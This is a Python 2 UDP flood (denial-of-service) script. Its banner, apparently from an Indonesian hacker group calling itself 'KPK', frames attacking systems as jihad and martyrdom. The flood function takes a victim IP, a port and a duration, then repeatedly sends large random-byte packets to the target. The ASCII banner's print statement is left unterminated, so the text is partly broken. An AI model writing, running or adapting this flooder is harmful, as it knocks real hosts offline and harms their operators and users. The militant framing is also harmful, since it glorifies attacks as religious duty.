import time
import socket
import random
import sys
def usage():
        print "###############################################################################"
        print "\033[1;32m"# [[ LOHAA]]
               --------------------------------------------------------------

                                    ASSALAMUALAIKUM

                --------------------------------------------------------------

                                        WE ARE KPK 

                                       KAMI DATANG
           
                                        UNTUK JIHAD 

                                    [[ GA USAH PANIK ]]

                                        [[ I COME TO ]]
                                             ATTACK

                                  °°° FVCKING YOUR °°°
                                             SYSTEM
          

                                          GAGAL KAMI
                                          MATI SYAHID    


                                    ( KPK )         ( KPK)
                                    ( KPK )     ( KPK )
                                    ( KPK )( KPK )
                                    ( KPK )     ( KPK )
                                    ( KPK )         ( KPK )    
                                    -------------------------------
                                    ( KPK )( KPK )( KPK )( KPK )
                                    ( KPK )                         ( KPK )
                                    ( KPK )( KPK )( KPK )( KPK )
                                    ( KPK )
                                    ( KPK )
                                    ( KPK )   
                                   -------------------------------
                                   ( KPK )           ( KPK )
                                   ( KPK )     ( KPK )
                                   ( KPK )( KPK)
                                   ( KPK )     ( KPK )
                                   ( KPK )          ( KPK )
-----------------------------------------------------------------------------------------------------------------------------------------------------------------#"
        print "#----------------------[\033[1;33mKOMUNITAS~PEMBERANTAS~KEMAKSIATAN\033[1;32m]---------------------------#"
        print "#              \033[1;91mTo-run: " "python2 ddos "  "<ip> <port> <packet> \033[1;32m                      #"
        print "#                                                                              #"
        print "#\033[1;32m##########################\033[1;33m  Creator:Lee KPK \033[1;32m###########################"
        print "################################################################################"
def flood(victim, vport, duration):
    client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    bytes = random._urandom(20000)
    timeout =  time.time() + duration
    sent = 3000

    while 1:
        if time.time() > timeout:
            break
        else:
            pass
        client.sendto(bytes, (victim, vport))
        sent = sent + 1
        print "\033[1;33mKPK~Ready \033[1;32m%s \033[1;91mattack \033[1;32m%s \033[1;91mto port \033[1;32m%s \033[1;93m~~~~~~> KPK ATTACKERS"%(sent, victim, vport)
def main():
    print len(sys.argv)
    if len(sys.argv) != 4:
        usage()
    else:
        flood(sys.argv[1], int(sys.argv[2]), int(sys.argv[3]))

if __name__ == '__main__':
    main()
